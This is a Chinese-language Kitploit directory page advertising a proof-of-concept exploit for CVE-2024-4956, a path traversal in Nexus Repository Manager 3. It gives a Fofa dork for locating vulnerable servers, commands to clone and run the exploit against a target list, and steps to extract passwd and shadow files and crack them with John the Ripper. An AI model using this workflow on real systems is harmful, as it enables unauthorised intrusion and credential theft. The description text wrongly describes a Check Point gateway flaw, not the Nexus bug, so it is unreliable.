Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - Nexus Repository Manager 3 未授权路径遍历 | Kitploit
工具/GitHubGitHub/verylazytech/cve-2024-4956
密码破解侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - Nexus Repository Manager 3 未授权路径遍历

查看仓库
164281年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Nexus Repository Manager 3 未经身份验证的路径遍历

攻击者可能能够在连接到互联网并启用 Remote Access VPN 或 Mobile Access Software Blades 后,读取 Check Point Security Gateways 上的某些信息。目前已有可缓解此漏洞的安全修复程序。

了解更多 — CVE-2024-4956

免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意,使用此工具攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发人员不承担任何责任,也不对由本程序引起的任何滥用或损害负责。

开始使用

查找目标

要查找潜在目标,可使用 Fofa(类似于 Shodan.io):

  • Fofa Dork: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

首先,克隆仓库:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

接下来,选择你的目标,并按以下格式将其添加到 list.txt 文件中:

  • https://ip_address

运行漏洞利用程序:

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

输出的是找到的 passwd 和 shadow 文件:

Alt text

现在,在找到 passwd 和 shadow 这两个文件后,你可以尝试使用 JohnTheRipper 破解哈希。运行漏洞利用程序后,你会得到 passwd 和 shadow 两个文件,因此可以将它们合并到一个文件中并尝试破解(我使用了 rockyou.txt,但可以使用任何密码字典):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
下载工具